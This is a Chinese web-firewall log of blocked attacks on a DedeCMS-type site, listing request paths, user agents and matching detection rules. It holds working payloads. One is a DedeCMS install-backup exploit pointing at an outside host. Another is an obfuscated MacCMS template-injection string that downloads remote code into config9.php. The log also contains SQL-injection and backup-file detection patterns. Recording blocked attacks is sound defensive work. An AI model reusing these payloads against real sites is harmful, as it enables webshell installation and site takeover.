dede网站被攻击拦截记录

/install/index.php.bak?step＝11&insLockfile＝a&s_lang＝a&install_demo_name＝demodata.php&updateHost＝http://acedgwf.cn/

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

\.(bak|inc|old|mdb|sql|php~|swp|java|class)$

1:/install/index.php.bak

空

/data/mysqli_error_trace.inc

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

\.(bak|inc|old|mdb|sql|php~|swp|java|class)$

1:/data/mysqli_error_trace.inc

空

/plus/diy.php

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser

\s+(or|xor|and)\s+.*(＝|<|>|‘|")

29: days trial _ and it even includes International Long Distance Calling. You have customers waiting to talk with you right now_ don_t keep them waiting. CLICK HERE http://www.talkwithwebvisitor.com to try Talk With Web Visitor now. If you‘d like to unsubscribe click here http://talkwithwebvisitor.com/unsubscribe.aspx?d＝xx.com

空

/index.php?m＝vod-search

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html

/\*

wd:delete一大堆空白字符＝ass.ert{if-A:var_dump(parse_str(str_replace(_,e,substr($iar[2][0],-10,8))))||var_dump(parse_str(str_replace(x,e,substr($iar[2][0],-25,15))))||var_dump($a($b(ZmlsZV9wdXRfY29udGVudHMoJy4vY29uZmlnOS5waHAnLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2xhLmxhbGEtbXkuY2x1Yi9pbmMudHh0JykpOyA7)))/*\x5C//b＝basx64_decodea＝ass_rt*/}{endif-A}

空